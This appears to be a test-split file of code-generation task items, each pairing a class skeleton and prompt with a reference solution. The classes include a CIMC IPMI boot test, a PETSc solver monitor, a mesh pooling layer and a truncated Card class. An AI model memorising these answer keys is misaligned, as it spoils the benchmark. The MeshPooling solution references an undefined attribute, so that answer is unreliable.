{"blob_id": "14388c43e0808f12454f282c0f52bea3563b8e96", "bodies": ["log.info('Setup Section verifyProcessorDetails')\nhost_ip = classparam['host_ip']\nboot_order_obj = classparam['boot_order_obj']\nself.host_serial_handle = classparam['host_serial_handle']\nself.host_serial_handle.connect_to_host_serial()\nlog.info('Create boot device from CIMC config and boot from it')\nif boot_order_obj.create_and_config_localhdd_boot_device('HDD') is False:\n self.failed('Failed to create boot device from CIMC')\nlog.info('Waiting for host to boot into respective boot device')\ncimc_util_obj.power_cycle_host()\nres = cimc_util_obj.verify_host_up(hostname=host_ip, wait_for_ping_fail=False)\nif res is False:\n self.failed('Failed to boot from cimc configured boot device')\nelse:\n log.info('Successfully booted from cimc configured boot device')", "expected_out = classparam['expected_out']\nvalidation_string = classparam['validation_string']\nbootdev = parameter\noptions = 'persistent'\ncmd_out = configure_boot_device_ipmi(config, bootdev, options)\nif cmd_out == expected_out + bootdev:\n log.info('Successfully executed, and got expected output: ' + str(cmd_out))\nelse:\n log.error('Failed to get expected command output. Expected was %s, but got as %s' % (expected_out + bootdev, cmd_out))\nlog.info('Validation: connecting host over telnet and verify console logs')\nlog.info('1st Host reboot: Verify that host boots to expected boot device %s' % parameter)\ncimc_util_obj.power_cycle_host()\ncmd = validation_string[parameter]\nlog.info('Expected string is: ' + str(cmd.encode()))\nresult = self.host_serial_handle.validate_host_console_output(exp_string=cmd.encode())\nif result == 'Fail':\n self.failed('Failed to validate persistent boot for boot device %s' % parameter)\nlog.info('2nd Host Reboot: Verify that host boots again to previously booted boot device %s' % parameter)\ncimc_util_obj.power_cycle_host()\ncmd = validation_string[parameter]\nlog.info('Expected string is: ' + str(cmd.encode()))\nresult2 = self.host_serial_handle.validate_host_console_output(exp_string=cmd.encode())\nif result2 == 'Fail':\n self.failed('Failed to validate persistent boot for boot device %s' % parameter)\nself.passed('Successfully validated persistent ipmi boot for boot device %s' % parameter)", "self.host_serial_handle.disconnect()\nremove_consistent_ipmi_boot(cimc_util_obj, config)\nlog.info('Cleanup section passed')"], "bodies_text": "<|body_start_0|>\n log.info('Setup Section verifyProcessorDetails')\n host_ip = classparam['host_ip']\n boot_order_obj = classparam['boot_order_obj']\n self.host_serial_handle = classparam['host_serial_handle']\n self.host_serial_handle.connect_to_host_serial()\n log.info('Create boot device from CIMC config and boot from it')\n if boot_order_obj.create_and_config_localhdd_boot_device('HDD') is False:\n self.failed('Failed to create boot device from CIMC')\n log.info('Waiting for host to boot into respective boot device')\n cimc_util_obj.power_cycle_host()\n res = cimc_util_obj.verify_host_up(hostname=host_ip, wait_for_ping_fail=False)\n if res is False:\n self.failed('Failed to boot from cimc configured boot device')\n else:\n log.info('Successfully booted from cimc configured boot device')\n<|end_body_0|>\n\n<|body_start_1|>\n expected_out = classparam['expected_out']\n validation_string = classparam['validation_string']\n bootdev = parameter\n options = 'persistent'\n cmd_out = configure_boot_device_ipmi(config, bootdev, options)\n if cmd_out == expected_out + bootdev:\n 
log.info('Successfully executed, and got expected output: ' + str(cmd_out))\n else:\n log.error('Failed to get expected command output. Expected was %s, but got as %s' % (expected_out + bootdev, cmd_out))\n log.info('Validation: connecting host over telnet and verify console logs')\n log.info('1st Host reboot: Verify that host boots to expected boot device %s' % parameter)\n cimc_util_obj.power_cycle_host()\n cmd = validation_string[parameter]\n log.info('Expected string is: ' + str(cmd.encode()))\n result = self.host_serial_handle.validate_host_console_output(exp_string=cmd.encode())\n if result == 'Fail':\n self.failed('Failed to validate persistent boot for boot device %s' % parameter)\n log.info('2nd Host Reboot: Verify that host boots again to previously booted boot device %s' % parameter)\n cimc_util_obj.power_cycle_host()\n cmd = validation_string[parameter]\n log.info('Expected string is: ' + str(cmd.encode()))\n result2 = self.host_serial_handle.validate_host_console_output(exp_string=cmd.encode())\n if result2 == 'Fail':\n self.failed('Failed to validate persistent boot for boot device %s' % parameter)\n self.passed('Successfully validated persistent ipmi boot for boot device %s' % parameter)\n<|end_body_1|>\n\n<|body_start_2|>\n self.host_serial_handle.disconnect()\n remove_consistent_ipmi_boot(cimc_util_obj, config)\n log.info('Cleanup section passed')\n<|end_body_2|>\n", "class_docstring": "Configure boot device to bios, pxe, hdd, cdrom, floppy in persistent mode when boot device created using cimc config and booted from it", "class_name": "CimcConfigIPMICmdPersistentBootDevice", "detected_licenses": [], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass CimcConfigIPMICmdPersistentBootDevice:\n \"\"\"Configure boot device to bios, pxe, hdd, cdrom, floppy in persistent mode when boot device created using cimc config and booted from it\"\"\"\n\n def setup(self, cimc_util_obj):\n \"\"\"Test Case Setup\"\"\"\n <|body_0|>\n\n def test(self, cimc_util_obj, config, parameter):\n \"\"\"ipmi command to set boot to bios, pxe, hdd, cdrom, floppy drive options in persistent mode when cimc config set and booted from it\"\"\"\n <|body_1|>\n\n def cleanup(self, cimc_util_obj, config):\n \"\"\"Test Case Cleanup\"\"\"\n <|body_2|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n log.info('Setup Section verifyProcessorDetails')\n host_ip = classparam['host_ip']\n boot_order_obj = classparam['boot_order_obj']\n self.host_serial_handle = classparam['host_serial_handle']\n self.host_serial_handle.connect_to_host_serial()\n log.info('Create boot device from CIMC config and boot from it')\n if boot_order_obj.create_and_config_localhdd_boot_device('HDD') is False:\n self.failed('Failed to create boot device from CIMC')\n log.info('Waiting for host to boot into respective boot device')\n cimc_util_obj.power_cycle_host()\n res = cimc_util_obj.verify_host_up(hostname=host_ip, wait_for_ping_fail=False)\n if res is False:\n self.failed('Failed to boot from cimc configured boot device')\n else:\n log.info('Successfully booted from cimc configured boot device')\n<|end_body_0|>\n\n<|body_start_1|>\n expected_out = classparam['expected_out']\n validation_string = classparam['validation_string']\n bootdev = parameter\n options = 'persistent'\n cmd_out = configure_boot_device_ipmi(config, bootdev, options)\n if cmd_out == expected_out + bootdev:\n log.info('Successfully executed, and got expected output: ' + str(cmd_out))\n else:\n log.error('Failed to get expected command output. 
Expected was %s, but got as %s' % (expected_out + bootdev, cmd_out))\n log.info('Validation: connecting host over telnet and verify console logs')\n log.info('1st Host reboot: Verify that host boots to expected boot device %s' % parameter)\n cimc_util_obj.power_cycle_host()\n cmd = validation_string[parameter]\n log.info('Expected string is: ' + str(cmd.encode()))\n result = self.host_serial_handle.validate_host_console_output(exp_string=cmd.encode())\n if result == 'Fail':\n self.failed('Failed to validate persistent boot for boot device %s' % parameter)\n log.info('2nd Host Reboot: Verify that host boots again to previously booted boot device %s' % parameter)\n cimc_util_obj.power_cycle_host()\n cmd = validation_string[parameter]\n log.info('Expected string is: ' + str(cmd.encode()))\n result2 = self.host_serial_handle.validate_host_console_output(exp_string=cmd.encode())\n if result2 == 'Fail':\n self.failed('Failed to validate persistent boot for boot device %s' % parameter)\n self.passed('Successfully validated persistent ipmi boot for boot device %s' % parameter)\n<|end_body_1|>\n\n<|body_start_2|>\n self.host_serial_handle.disconnect()\n remove_consistent_ipmi_boot(cimc_util_obj, config)\n log.info('Cleanup section passed')\n<|end_body_2|>\n", "id": "stack_v2_sparse_classes_10k_test_000000", "length_bytes": 19363, "license_type": "no_license", "methods": [{"docstring": "Test Case Setup", "name": "setup", "signature": "def setup(self, cimc_util_obj)"}, {"docstring": "ipmi command to set boot to bios, pxe, hdd, cdrom, floppy drive options in persistent mode when cimc config set and booted from it", "name": "test", "signature": "def test(self, cimc_util_obj, config, parameter)"}, {"docstring": "Test Case Cleanup", "name": "cleanup", "signature": "def cleanup(self, cimc_util_obj, config)"}], "n_methods": 3, "original_id": "stack_v2_sparse_classes_30k_train_000981", "prompt": "Implement the Python class `CimcConfigIPMICmdPersistentBootDevice` described below.\n\nClass description:\nConfigure boot device to bios, pxe, hdd, cdrom, floppy in persistent mode when boot device created using cimc config and booted from it\n\nMethod signatures and docstrings:\n- def setup(self, cimc_util_obj): Test Case Setup\n- def test(self, cimc_util_obj, config, parameter): ipmi command to set boot to bios, pxe, hdd, cdrom, floppy drive options in persistent mode when cimc config set and booted from it\n- def cleanup(self, cimc_util_obj, config): Test Case Cleanup", "prompted_full_text": "Implement the Python class `CimcConfigIPMICmdPersistentBootDevice` described below.\n\nClass description:\nConfigure boot device to bios, pxe, hdd, cdrom, floppy in persistent mode when boot device created using cimc config and booted from it\n\nMethod signatures and docstrings:\n- def setup(self, cimc_util_obj): Test Case Setup\n- def test(self, cimc_util_obj, config, parameter): ipmi command to set boot to bios, pxe, hdd, cdrom, floppy drive options in persistent mode when cimc config set and booted from it\n- def cleanup(self, cimc_util_obj, config): Test Case Cleanup\n\n<|skeleton|>\nclass CimcConfigIPMICmdPersistentBootDevice:\n \"\"\"Configure boot device to bios, pxe, hdd, cdrom, floppy in persistent mode when boot device created using cimc config and booted from it\"\"\"\n\n def setup(self, cimc_util_obj):\n \"\"\"Test Case Setup\"\"\"\n <|body_0|>\n\n def test(self, cimc_util_obj, config, parameter):\n \"\"\"ipmi command to set boot to bios, pxe, hdd, cdrom, floppy drive options in persistent mode when cimc config 
set and booted from it\"\"\"\n <|body_1|>\n\n def cleanup(self, cimc_util_obj, config):\n \"\"\"Test Case Cleanup\"\"\"\n <|body_2|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n log.info('Setup Section verifyProcessorDetails')\n host_ip = classparam['host_ip']\n boot_order_obj = classparam['boot_order_obj']\n self.host_serial_handle = classparam['host_serial_handle']\n self.host_serial_handle.connect_to_host_serial()\n log.info('Create boot device from CIMC config and boot from it')\n if boot_order_obj.create_and_config_localhdd_boot_device('HDD') is False:\n self.failed('Failed to create boot device from CIMC')\n log.info('Waiting for host to boot into respective boot device')\n cimc_util_obj.power_cycle_host()\n res = cimc_util_obj.verify_host_up(hostname=host_ip, wait_for_ping_fail=False)\n if res is False:\n self.failed('Failed to boot from cimc configured boot device')\n else:\n log.info('Successfully booted from cimc configured boot device')\n<|end_body_0|>\n\n<|body_start_1|>\n expected_out = classparam['expected_out']\n validation_string = classparam['validation_string']\n bootdev = parameter\n options = 'persistent'\n cmd_out = configure_boot_device_ipmi(config, bootdev, options)\n if cmd_out == expected_out + bootdev:\n log.info('Successfully executed, and got expected output: ' + str(cmd_out))\n else:\n log.error('Failed to get expected command output. Expected was %s, but got as %s' % (expected_out + bootdev, cmd_out))\n log.info('Validation: connecting host over telnet and verify console logs')\n log.info('1st Host reboot: Verify that host boots to expected boot device %s' % parameter)\n cimc_util_obj.power_cycle_host()\n cmd = validation_string[parameter]\n log.info('Expected string is: ' + str(cmd.encode()))\n result = self.host_serial_handle.validate_host_console_output(exp_string=cmd.encode())\n if result == 'Fail':\n self.failed('Failed to validate persistent boot for boot device %s' % parameter)\n log.info('2nd Host Reboot: Verify that host boots again to previously booted boot device %s' % parameter)\n cimc_util_obj.power_cycle_host()\n cmd = validation_string[parameter]\n log.info('Expected string is: ' + str(cmd.encode()))\n result2 = self.host_serial_handle.validate_host_console_output(exp_string=cmd.encode())\n if result2 == 'Fail':\n self.failed('Failed to validate persistent boot for boot device %s' % parameter)\n self.passed('Successfully validated persistent ipmi boot for boot device %s' % parameter)\n<|end_body_1|>\n\n<|body_start_2|>\n self.host_serial_handle.disconnect()\n remove_consistent_ipmi_boot(cimc_util_obj, config)\n log.info('Cleanup section passed')\n<|end_body_2|>\n", "revision_id": "c255e045a4950a0d8868a10012d5ce6e5c6a9c23", "skeleton": "<|skeleton|>\nclass CimcConfigIPMICmdPersistentBootDevice:\n \"\"\"Configure boot device to bios, pxe, hdd, cdrom, floppy in persistent mode when boot device created using cimc config and booted from it\"\"\"\n\n def setup(self, cimc_util_obj):\n \"\"\"Test Case Setup\"\"\"\n <|body_0|>\n\n def test(self, cimc_util_obj, config, parameter):\n \"\"\"ipmi command to set boot to bios, pxe, hdd, cdrom, floppy drive options in persistent mode when cimc config set and booted from it\"\"\"\n <|body_1|>\n\n def cleanup(self, cimc_util_obj, config):\n \"\"\"Test Case Cleanup\"\"\"\n <|body_2|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class CimcConfigIPMICmdPersistentBootDevice:\n \"\"\"Configure boot device to bios, pxe, hdd, 
cdrom, floppy in persistent mode when boot device created using cimc config and booted from it\"\"\"\n\n def setup(self, cimc_util_obj):\n \"\"\"Test Case Setup\"\"\"\n log.info('Setup Section verifyProcessorDetails')\n host_ip = classparam['host_ip']\n boot_order_obj = classparam['boot_order_obj']\n self.host_serial_handle = classparam['host_serial_handle']\n self.host_serial_handle.connect_to_host_serial()\n log.info('Create boot device from CIMC config and boot from it')\n if boot_order_obj.create_and_config_localhdd_boot_device('HDD') is False:\n self.failed('Failed to create boot device from CIMC')\n log.info('Waiting for host to boot into respective boot device')\n cimc_util_obj.power_cycle_host()\n res = cimc_util_obj.verify_host_up(hostname=host_ip, wait_for_ping_fail=False)\n if res is False:\n self.failed('Failed to boot from cimc configured boot device')\n else:\n log.info('Successfully booted from cimc configured boot device')\n\n def test(self, cimc_util_obj, config, parameter):\n \"\"\"ipmi command to set boot to bios, pxe, hdd, cdrom, floppy drive options in persistent mode when cimc config set and booted from it\"\"\"\n expected_out = classparam['expected_out']\n validation_string = classparam['validation_string']\n bootdev = parameter\n options = 'persistent'\n cmd_out = configure_boot_device_ipmi(config, bootdev, options)\n if cmd_out == expected_out + bootdev:\n log.info('Successfully executed, and got expected output: ' + str(cmd_out))\n else:\n log.error('Failed to get expected command output. Expected was %s, but got as %s' % (expected_out + bootdev, cmd_out))\n log.info('Validation: connecting host over telnet and verify console logs')\n log.info('1st Host reboot: Verify that host boots to expected boot device %s' % parameter)\n cimc_util_obj.power_cycle_host()\n cmd = validation_string[parameter]\n log.info('Expected string is: ' + str(cmd.encode()))\n result = self.host_serial_handle.validate_host_console_output(exp_string=cmd.encode())\n if result == 'Fail':\n self.failed('Failed to validate persistent boot for boot device %s' % parameter)\n log.info('2nd Host Reboot: Verify that host boots again to previously booted boot device %s' % parameter)\n cimc_util_obj.power_cycle_host()\n cmd = validation_string[parameter]\n log.info('Expected string is: ' + str(cmd.encode()))\n result2 = self.host_serial_handle.validate_host_console_output(exp_string=cmd.encode())\n if result2 == 'Fail':\n self.failed('Failed to validate persistent boot for boot device %s' % parameter)\n self.passed('Successfully validated persistent ipmi boot for boot device %s' % parameter)\n\n def cleanup(self, cimc_util_obj, config):\n \"\"\"Test Case Cleanup\"\"\"\n self.host_serial_handle.disconnect()\n remove_consistent_ipmi_boot(cimc_util_obj, config)\n log.info('Cleanup section passed')\n", "source": "the_stack_v2_python_sparse", "source_path": "ipmi_cmnd_bootorder.py", "source_repo": "jrchanda/MyRepo", "split": "test", "star_events_count": 0} {"blob_id": "68ae12766519a9d97480fc856f792bdf7c9134f0", "bodies": ["self._solver = solver\nself._norm = 1.0\nself._norm0 = 1.0", "if counter == 0 and norm != 0.0:\n self._norm0 = norm\nself._norm = norm\nself._solver._mpi_print(counter, norm, norm / self._norm0)\nself._solver._iter_count += 1"], "bodies_text": "<|body_start_0|>\n self._solver = solver\n self._norm = 1.0\n self._norm0 = 1.0\n<|end_body_0|>\n\n<|body_start_1|>\n if counter == 0 and norm != 0.0:\n self._norm0 = norm\n self._norm = norm\n self._solver._mpi_print(counter, norm, norm / 
self._norm0)\n self._solver._iter_count += 1\n<|end_body_1|>\n", "class_docstring": "Prints output from PETSc's KSP solvers. Callable object given to KSP as a callback for printing the residual. Attributes ---------- _solver : _solver the openmdao solver. _norm : float the current norm. _norm0 : float the norm for the first iteration.", "class_name": "Monitor", "detected_licenses": [], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass Monitor:\n \"\"\"Prints output from PETSc's KSP solvers. Callable object given to KSP as a callback for printing the residual. Attributes ---------- _solver : _solver the openmdao solver. _norm : float the current norm. _norm0 : float the norm for the first iteration.\"\"\"\n\n def __init__(self, solver):\n \"\"\"Store pointer to the openmdao solver and initialize norms. Parameters ---------- solver : object the openmdao solver.\"\"\"\n <|body_0|>\n\n def __call__(self, ksp, counter, norm):\n \"\"\"Store norm if first iteration, and print norm. Parameters ---------- ksp : object the KSP solver. counter : int the counter. norm : float the norm.\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n self._solver = solver\n self._norm = 1.0\n self._norm0 = 1.0\n<|end_body_0|>\n\n<|body_start_1|>\n if counter == 0 and norm != 0.0:\n self._norm0 = norm\n self._norm = norm\n self._solver._mpi_print(counter, norm, norm / self._norm0)\n self._solver._iter_count += 1\n<|end_body_1|>\n", "id": "stack_v2_sparse_classes_10k_test_000001", "length_bytes": 13874, "license_type": "no_license", "methods": [{"docstring": "Store pointer to the openmdao solver and initialize norms. Parameters ---------- solver : object the openmdao solver.", "name": "__init__", "signature": "def __init__(self, solver)"}, {"docstring": "Store norm if first iteration, and print norm. Parameters ---------- ksp : object the KSP solver. counter : int the counter. norm : float the norm.", "name": "__call__", "signature": "def __call__(self, ksp, counter, norm)"}], "n_methods": 2, "original_id": "stack_v2_sparse_classes_30k_train_001195", "prompt": "Implement the Python class `Monitor` described below.\n\nClass description:\nPrints output from PETSc's KSP solvers. Callable object given to KSP as a callback for printing the residual. Attributes ---------- _solver : _solver the openmdao solver. _norm : float the current norm. _norm0 : float the norm for the first iteration.\n\nMethod signatures and docstrings:\n- def __init__(self, solver): Store pointer to the openmdao solver and initialize norms. Parameters ---------- solver : object the openmdao solver.\n- def __call__(self, ksp, counter, norm): Store norm if first iteration, and print norm. Parameters ---------- ksp : object the KSP solver. counter : int the counter. norm : float the norm.", "prompted_full_text": "Implement the Python class `Monitor` described below.\n\nClass description:\nPrints output from PETSc's KSP solvers. Callable object given to KSP as a callback for printing the residual. Attributes ---------- _solver : _solver the openmdao solver. _norm : float the current norm. _norm0 : float the norm for the first iteration.\n\nMethod signatures and docstrings:\n- def __init__(self, solver): Store pointer to the openmdao solver and initialize norms. Parameters ---------- solver : object the openmdao solver.\n- def __call__(self, ksp, counter, norm): Store norm if first iteration, and print norm. Parameters ---------- ksp : object the KSP solver. counter : int the counter. 
norm : float the norm.\n\n<|skeleton|>\nclass Monitor:\n \"\"\"Prints output from PETSc's KSP solvers. Callable object given to KSP as a callback for printing the residual. Attributes ---------- _solver : _solver the openmdao solver. _norm : float the current norm. _norm0 : float the norm for the first iteration.\"\"\"\n\n def __init__(self, solver):\n \"\"\"Store pointer to the openmdao solver and initialize norms. Parameters ---------- solver : object the openmdao solver.\"\"\"\n <|body_0|>\n\n def __call__(self, ksp, counter, norm):\n \"\"\"Store norm if first iteration, and print norm. Parameters ---------- ksp : object the KSP solver. counter : int the counter. norm : float the norm.\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n self._solver = solver\n self._norm = 1.0\n self._norm0 = 1.0\n<|end_body_0|>\n\n<|body_start_1|>\n if counter == 0 and norm != 0.0:\n self._norm0 = norm\n self._norm = norm\n self._solver._mpi_print(counter, norm, norm / self._norm0)\n self._solver._iter_count += 1\n<|end_body_1|>\n", "revision_id": "d9e89fe017f1131d554599c248247f73bb9b534d", "skeleton": "<|skeleton|>\nclass Monitor:\n \"\"\"Prints output from PETSc's KSP solvers. Callable object given to KSP as a callback for printing the residual. Attributes ---------- _solver : _solver the openmdao solver. _norm : float the current norm. _norm0 : float the norm for the first iteration.\"\"\"\n\n def __init__(self, solver):\n \"\"\"Store pointer to the openmdao solver and initialize norms. Parameters ---------- solver : object the openmdao solver.\"\"\"\n <|body_0|>\n\n def __call__(self, ksp, counter, norm):\n \"\"\"Store norm if first iteration, and print norm. Parameters ---------- ksp : object the KSP solver. counter : int the counter. norm : float the norm.\"\"\"\n <|body_1|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class Monitor:\n \"\"\"Prints output from PETSc's KSP solvers. Callable object given to KSP as a callback for printing the residual. Attributes ---------- _solver : _solver the openmdao solver. _norm : float the current norm. _norm0 : float the norm for the first iteration.\"\"\"\n\n def __init__(self, solver):\n \"\"\"Store pointer to the openmdao solver and initialize norms. Parameters ---------- solver : object the openmdao solver.\"\"\"\n self._solver = solver\n self._norm = 1.0\n self._norm0 = 1.0\n\n def __call__(self, ksp, counter, norm):\n \"\"\"Store norm if first iteration, and print norm. Parameters ---------- ksp : object the KSP solver. counter : int the counter. 
norm : float the norm.\"\"\"\n if counter == 0 and norm != 0.0:\n self._norm0 = norm\n self._norm = norm\n self._solver._mpi_print(counter, norm, norm / self._norm0)\n self._solver._iter_count += 1\n", "source": "the_stack_v2_python_sparse", "source_path": "venv/Lib/site-packages/openmdao/solvers/linear/petsc_ksp.py", "source_repo": "ManojDjs/Heart-rate-estimation", "split": "test", "star_events_count": 1} {"blob_id": "1f45d7634752d535e2fae7d0c26f04eedfae0b39", "bodies": ["super(MeshPooling, self).__init__()\nself.cached = cached\nself.index = index\nself.face = face", "if self.matrix is None or not self.cached:\n self.face, self.index = unsubdivide(x.pos, x.face)[1:]\nx.pos = x.pos[self.index]\nx.norm = x.norm[self.index]\nx.face = self.face\nif len(args) == 0:\n return x\nreturn (x,) + tuple([a[self.index] for a in args])"], "bodies_text": "<|body_start_0|>\n super(MeshPooling, self).__init__()\n self.cached = cached\n self.index = index\n self.face = face\n<|end_body_0|>\n\n<|body_start_1|>\n if self.matrix is None or not self.cached:\n self.face, self.index = unsubdivide(x.pos, x.face)[1:]\n x.pos = x.pos[self.index]\n x.norm = x.norm[self.index]\n x.face = self.face\n if len(args) == 0:\n return x\n return (x,) + tuple([a[self.index] for a in args])\n<|end_body_1|>\n", "class_docstring": "A class representing a mesh pooling layer. It supposes the input mesh is trivially poolable Attributes ---------- cached : bool if True caches the pooling data, otherwise computes it at every input index : LongTensor the vertices indices face : LongTensor the topology tensor Methods ------- forward(x, *args) pools the input data", "class_name": "MeshPooling", "detected_licenses": ["MIT"], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass MeshPooling:\n \"\"\"A class representing a mesh pooling layer. It supposes the input mesh is trivially poolable Attributes ---------- cached : bool if True caches the pooling data, otherwise computes it at every input index : LongTensor the vertices indices face : LongTensor the topology tensor Methods ------- forward(x, *args) pools the input data\"\"\"\n\n def __init__(self, index=None, face=None, cached=True):\n \"\"\"Parameters ---------- index : LongTensor (optional) the vertices indices (default is None) face : LongTensor (optional) the topology tensor (default is None) cached : bool (optional) if True caches the pooling data, otherwise computes it at every input (default is True)\"\"\"\n <|body_0|>\n\n def forward(self, x, *args):\n \"\"\"Pools the input data Parameters ---------- x : Data the input mesh with N vertices args : Tensor... optional (N,D,) tensors Returns ------- Data or (Data, Tensor...) 
the pooled mesh and the other input data\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n super(MeshPooling, self).__init__()\n self.cached = cached\n self.index = index\n self.face = face\n<|end_body_0|>\n\n<|body_start_1|>\n if self.matrix is None or not self.cached:\n self.face, self.index = unsubdivide(x.pos, x.face)[1:]\n x.pos = x.pos[self.index]\n x.norm = x.norm[self.index]\n x.face = self.face\n if len(args) == 0:\n return x\n return (x,) + tuple([a[self.index] for a in args])\n<|end_body_1|>\n", "id": "stack_v2_sparse_classes_10k_test_000002", "length_bytes": 1745, "license_type": "permissive", "methods": [{"docstring": "Parameters ---------- index : LongTensor (optional) the vertices indices (default is None) face : LongTensor (optional) the topology tensor (default is None) cached : bool (optional) if True caches the pooling data, otherwise computes it at every input (default is True)", "name": "__init__", "signature": "def __init__(self, index=None, face=None, cached=True)"}, {"docstring": "Pools the input data Parameters ---------- x : Data the input mesh with N vertices args : Tensor... optional (N,D,) tensors Returns ------- Data or (Data, Tensor...) the pooled mesh and the other input data", "name": "forward", "signature": "def forward(self, x, *args)"}], "n_methods": 2, "prompt": "Implement the Python class `MeshPooling` described below.\n\nClass description:\nA class representing a mesh pooling layer. It supposes the input mesh is trivially poolable Attributes ---------- cached : bool if True caches the pooling data, otherwise computes it at every input index : LongTensor the vertices indices face : LongTensor the topology tensor Methods ------- forward(x, *args) pools the input data\n\nMethod signatures and docstrings:\n- def __init__(self, index=None, face=None, cached=True): Parameters ---------- index : LongTensor (optional) the vertices indices (default is None) face : LongTensor (optional) the topology tensor (default is None) cached : bool (optional) if True caches the pooling data, otherwise computes it at every input (default is True)\n- def forward(self, x, *args): Pools the input data Parameters ---------- x : Data the input mesh with N vertices args : Tensor... optional (N,D,) tensors Returns ------- Data or (Data, Tensor...) the pooled mesh and the other input data", "prompted_full_text": "Implement the Python class `MeshPooling` described below.\n\nClass description:\nA class representing a mesh pooling layer. It supposes the input mesh is trivially poolable Attributes ---------- cached : bool if True caches the pooling data, otherwise computes it at every input index : LongTensor the vertices indices face : LongTensor the topology tensor Methods ------- forward(x, *args) pools the input data\n\nMethod signatures and docstrings:\n- def __init__(self, index=None, face=None, cached=True): Parameters ---------- index : LongTensor (optional) the vertices indices (default is None) face : LongTensor (optional) the topology tensor (default is None) cached : bool (optional) if True caches the pooling data, otherwise computes it at every input (default is True)\n- def forward(self, x, *args): Pools the input data Parameters ---------- x : Data the input mesh with N vertices args : Tensor... optional (N,D,) tensors Returns ------- Data or (Data, Tensor...) the pooled mesh and the other input data\n\n<|skeleton|>\nclass MeshPooling:\n \"\"\"A class representing a mesh pooling layer. 
It supposes the input mesh is trivially poolable Attributes ---------- cached : bool if True caches the pooling data, otherwise computes it at every input index : LongTensor the vertices indices face : LongTensor the topology tensor Methods ------- forward(x, *args) pools the input data\"\"\"\n\n def __init__(self, index=None, face=None, cached=True):\n \"\"\"Parameters ---------- index : LongTensor (optional) the vertices indices (default is None) face : LongTensor (optional) the topology tensor (default is None) cached : bool (optional) if True caches the pooling data, otherwise computes it at every input (default is True)\"\"\"\n <|body_0|>\n\n def forward(self, x, *args):\n \"\"\"Pools the input data Parameters ---------- x : Data the input mesh with N vertices args : Tensor... optional (N,D,) tensors Returns ------- Data or (Data, Tensor...) the pooled mesh and the other input data\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n super(MeshPooling, self).__init__()\n self.cached = cached\n self.index = index\n self.face = face\n<|end_body_0|>\n\n<|body_start_1|>\n if self.matrix is None or not self.cached:\n self.face, self.index = unsubdivide(x.pos, x.face)[1:]\n x.pos = x.pos[self.index]\n x.norm = x.norm[self.index]\n x.face = self.face\n if len(args) == 0:\n return x\n return (x,) + tuple([a[self.index] for a in args])\n<|end_body_1|>\n", "revision_id": "2615b66dd4addfd5c03d9d91a24c7da414294308", "skeleton": "<|skeleton|>\nclass MeshPooling:\n \"\"\"A class representing a mesh pooling layer. It supposes the input mesh is trivially poolable Attributes ---------- cached : bool if True caches the pooling data, otherwise computes it at every input index : LongTensor the vertices indices face : LongTensor the topology tensor Methods ------- forward(x, *args) pools the input data\"\"\"\n\n def __init__(self, index=None, face=None, cached=True):\n \"\"\"Parameters ---------- index : LongTensor (optional) the vertices indices (default is None) face : LongTensor (optional) the topology tensor (default is None) cached : bool (optional) if True caches the pooling data, otherwise computes it at every input (default is True)\"\"\"\n <|body_0|>\n\n def forward(self, x, *args):\n \"\"\"Pools the input data Parameters ---------- x : Data the input mesh with N vertices args : Tensor... optional (N,D,) tensors Returns ------- Data or (Data, Tensor...) the pooled mesh and the other input data\"\"\"\n <|body_1|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class MeshPooling:\n \"\"\"A class representing a mesh pooling layer. It supposes the input mesh is trivially poolable Attributes ---------- cached : bool if True caches the pooling data, otherwise computes it at every input index : LongTensor the vertices indices face : LongTensor the topology tensor Methods ------- forward(x, *args) pools the input data\"\"\"\n\n def __init__(self, index=None, face=None, cached=True):\n \"\"\"Parameters ---------- index : LongTensor (optional) the vertices indices (default is None) face : LongTensor (optional) the topology tensor (default is None) cached : bool (optional) if True caches the pooling data, otherwise computes it at every input (default is True)\"\"\"\n super(MeshPooling, self).__init__()\n self.cached = cached\n self.index = index\n self.face = face\n\n def forward(self, x, *args):\n \"\"\"Pools the input data Parameters ---------- x : Data the input mesh with N vertices args : Tensor... 
optional (N,D,) tensors Returns ------- Data or (Data, Tensor...) the pooled mesh and the other input data\"\"\"\n if self.matrix is None or not self.cached:\n self.face, self.index = unsubdivide(x.pos, x.face)[1:]\n x.pos = x.pos[self.index]\n x.norm = x.norm[self.index]\n x.face = self.face\n if len(args) == 0:\n return x\n return (x,) + tuple([a[self.index] for a in args])\n", "source": "the_stack_v2_python_sparse", "source_path": "ACME/layer/MeshPooling.py", "source_repo": "mauriziokovacic/ACME", "split": "test", "star_events_count": 3} {"blob_id": "d65eebc3f1048bf5a6a5ef456aed644d44efba4a", "bodies": ["self.value = value\nself.suit = suit\nself.set_name()", "NAMES = {1: 'Ace', 11: 'Jack', 12: 'Queen', 13: 'King'}\nif self.value in NAMES:\n self.name = NAMES[self.value]", "if self.name is not None:\n return '{} of {}'.format(self.name, self.suit)\nreturn '{} of {}'.format(self.value, self.suit)", "if type(self) != type(other):\n return False\nreturn self.value == other.value and self.suit == other.suit"], "bodies_text": "<|body_start_0|>\n self.value = value\n self.suit = suit\n self.set_name()\n<|end_body_0|>\n\n<|body_start_1|>\n NAMES = {1: 'Ace', 11: 'Jack', 12: 'Queen', 13: 'King'}\n if self.value in NAMES:\n self.name = NAMES[self.value]\n<|end_body_1|>\n\n<|body_start_2|>\n if self.name is not None:\n return '{} of {}'.format(self.name, self.suit)\n return '{} of {}'.format(self.value, self.suit)\n<|end_body_2|>\n\n<|body_start_3|>\n if type(self) != type(other):\n return False\n return self.value == other.value and self.suit == other.suit\n<|end_body_3|>\n", "class_docstring": 